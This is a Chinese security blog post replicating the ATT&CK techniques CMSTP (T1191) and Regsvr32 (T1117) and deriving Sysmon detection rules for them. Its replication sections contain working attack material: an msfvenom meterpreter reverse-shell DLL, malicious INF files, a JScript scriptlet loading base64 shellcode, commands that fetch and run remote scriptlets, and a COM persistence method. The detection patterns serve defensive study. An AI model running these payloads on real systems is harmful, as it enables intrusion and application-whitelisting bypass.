ATT&CK攻防初窥系列--执行篇(二)

发布者:AiLPHA
发布于:2019-12-20 13:41

ATT&CK攻防初窥系列--执行篇(二)

继上篇ATT&CK攻防初窥系列--执行篇(一),我们复现并提取了T1196- Control Panel Items、T1220- XSL Script Processing检测特征后本篇我们复现一下T1191-CMSTP、T1117-Regsvr32并提取其检测特征。

T1191-CMSTP

Microsoft连接管理器配置文件安装程序(CMSTP.exe)是用于安装连接管理器服务配置文件的命令行程序。CMSTP.exe接受安装信息文件(INF)作为参数,并安装用于远程访问连接的服务配置文件。

攻击者可能会使用CMSTP.exe调用恶意的INF文件。与Regsvr32 相似,CMSTP.exe可能被利用从远程服务器加载和执行DLL或COM脚本(SCT)。由于CMSTP.exe是合法的,经过签名的Microsoft应用程序,因此该执行过程也可以绕过AppLocker和其他白名单防御。

CMSTP.exe也可以通过自动提升的COM接口从恶意INF执行任意命令绕过用户帐户控制

命令执行(DLL)

技术复现

创建dll后门文件

 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.58.133 LPORT=9999 -f dll -o backdoor.dll

创建恶意的INF文件

 ;cmstp_dll.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
 
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
 
[RegisterOCXSection]
C:\Users\777\Desktop\AH\backdoor.dll
 
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
Service
ShortSvc

将DLL和INF传输到目标主机,使用cmstp.exe调用恶意的INF文件

 cmstp /s cmstp_dll.inf

结果验证

执行cmstp上线主机



命令执行(SCT)

技术复现

建立HTTP服务器,放置SCT payload文件

 <?XML version="1.0"?>
<scriptlet>
<registration
  prog
  class >
  <script language="JScript">
    <![CDATA[
     function setversion() {
var shell = new ActiveXObject('WScript.Shell');
ver = 'v4.0.30319';
try {
shell.RegRead('HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\');
} catch(e) {
ver = 'v2.0.50727';
}
shell.Environment('Process')('COMPLUS_Version') = ver;

}
function debug(s) {}
function base64ToStream(b) {
        var enc = new ActiveXObject("System.Text.ASCIIEncoding");
        var length = enc.GetByteCount_2(b);
        var ba = enc.GetBytes_4(b);
        var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
        ba = transform.TransformFinalBlock(ba, 0, length);
        var ms = new ActiveXObject("System.IO.MemoryStream");
        ms.Write(ba, 0, (length / 4) * 3);
        ms.Position = 0;
        return ms;
}

var serialized_obj = ${PAYLOAD};
var entry_class = 'ShellCodeLauncher.Program';

try {
        setversion();
        var stm = base64ToStream(serialized_obj);
        var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
        var al = new ActiveXObject('System.Collections.ArrayList');
        var d = fmt.Deserialize_2(stm);
        al.Add(undefined);
        var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);

} catch (e) {
    debug(e.message);
}
    ]]>
</script>
</registration>
</scriptlet>

配置恶意的INF文件

 [version]
Signature=$chicago$
AdvancedINF=2.5
 
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
 
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://192.168.58.135:8000/bb.sct
 
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
Service
ShortSvc

结果验证

执行cmstp上线主机




威胁取证

命令执行(DLL)

进程特征:(级别:高)

# 当cmstp.exe作为父进程创建其他进程时,视为可疑
ParentImage contians 'cmstp.exe'



网络特征:(级别:仅审计)

# 当调用rundll32.exe运行dll时,若dll为通讯后门或drop程序,可能会连接外网C2或者下载后门程序,此时会发起网络连接,可审计rundll32的网络通讯结合其他类型日志进行分析
eventNum = 3 AND Image contians 'rundll32.exe'


命令执行(SCT)

加载项特征:(级别:高)

# 当使用sct文件作为payload时,cmstp会直接创建COM对象进行执行,所以在进程行为上看不见父子关系。但使用sct时,会执行sct文件中的脚本,此时就会调用jscript、vbscript此类脚本dll,视为可疑行为。
eventid = 7 AND ImageLoaded contains ('jscript' OR 'vbscript') AND Image contains 'cmstp.exe'



网络特征:(级别:高)

# 当使用sct文件作为payload时,由cmstp进程直接发起通讯,cmstp本身为配置安装服务配置程序,一般不会发起网络连接,故此视为可疑行为
eventNum = 3 AND Image contains 'cmstp.exe'


T1117-Regsvr32

Regsvr32.exe是一个命令行程序,用于在Windows系统上注册和取消注册对象链接,嵌入控件和动态链接库。Regsvr32.exe可用于执行任意二进制文件。

攻击者可以利用此功能来代理攻击代码的执行,以避免触发安全工具,这些工具可能无法监视regsvr32.exe进程的执行和加载的模块,因为Windows使用regsvr32.exe进行正常操作时会出现白名单或误报。Regsvr32.exe也是Microsoft签名的二进制文件。

Regsvr32.exe还可用于专门绕过进程白名单,使用功能加载COM scriptlet以在用户权限下执行DLL。由于regsvr32.exe具有网络功能,因此可以调用远程脚本来执行代码。

命令执行

读取远程payload执行
regsvr32 /s /n /u /i:<url/aa.sct> scrobj.dll
读取本地payload执行
regsvr32 /s /n /u /i:<aa.sct> scrobj.dll

技术复现

1. 建立aaa.sct文件放至HTTP服务

 File: aa.sct
<?XML version="1.0"?>
<scriptlet>
<registration
  prog
  class >
  <script language="JScript">
    <![CDATA[
      var foo = new ActiveXObject("WScript.Shell").Run("calc.exe");
    ]]>
</script>
</registration>
</scriptlet>

root@kali:~/L/sct# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...

结果验证


后门驻留

该技术用户后门的方式与远程命令执行类似,在调用远程脚本去掉选项 /n /u 让COM对象注册到注册表中,需要用脚本执行COM对象才能执行(这种方式还需要其他的机制触发脚本运行才能稳定控制,有点鸡肋),所以通过COM劫持替换常被调用的COM对象来实现驻留更为有效,COM劫持本篇不讨论,留在后门的文章详说。

技术复现

1. 创建COM对象的sct文件

 <?XML version="1.0"?>
<scriptlet>
<registration
  prog
  class
>
</registration>
<public>
  <method>
  </method>
</public>
<script language="JScript">
  <![CDATA[
    function exec(){
      new ActiveXObject('WScript.Shell').Run('calc.exe');
    }
  ]]>
</script>
</scriptlet>

2. 创建执行脚本调用COM对象

 var test = new ActiveXObject("Test");
test.exec()

结果验证

 

此时在注册表可以看见注册的COM对象


相关知识

1. Regsvr32的参数含义

 Regsvr32 [/s] [/n] [/i[:cmdline]] dllname
 /u 卸载安装的控件,卸载服务器注册
 /s 注册成功后不显示操作成功信息框
 /i 调用DllInstall函数并把可选参数[cmdline]传给它,当使用/u时用来卸载DLL
 /n 不调用DllRegisterServer,该参数必须和/i一起使用

 当使用 /u 时,命令不会在注册表注册COM对象,只会执行远程的scriptlet

2. srcobj.dll起到什么作用

 Scrobj.dll用于注册和取消注册COM对象,这是触发此操作所需的。详情见此

威胁取证

命令行特征:(级别:高)

# 不管是本地还是远程调用,都必须要关键字regsvr32,\i,scrobj.dll
eventid = 1 AND cmdline regex regsvr32\s+.*\i:.*?\s+scrobj.dll


加载项特征:(级别:高)

# 在执行scriptlet是会使用Jscript或者vbscript脚本,这样系统就会调用脚本程序
eventid = 7 AND ImageLoaded contains ('jscript' OR 'vbscript') AND Image contains 'regsvr32.exe'



验证vbscript作为payload确认会调用

<?XML version="1.0"?>
<scriptlet>
<registration
  prog
  class >
  <script language="vbscript">
    <![CDATA[
      set foo = createobject("WScript.Shell")
      foo.Run("cmd.exe /c calc.exe")
    ]]>
</script>
</registration>
</scriptlet>


进程特征:(级别:中)

# 当regsvr32作为父进程创建其他程序时是一种可疑行为
eventNum = 1 AND ParentImage contains 'regsvr32.exe'


参考

https://attack.mitre.org/techniques/T1191/

https://pentestlab.blog/2018/05/10/applocker-bypass-cmstp/

https://oddvar.moe/2017/08/15/research-on-cmstp-exe/

https://msitpros.com/?p=3960

https://attack.mitre.org/techniques/T1117/

https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/

https://security.stackexchange.com/questions/183021/how-does-this-applocker-bypass-work-exactly-squibblydoo


声明:该文观点仅代表作者本人,转载请注明来自看雪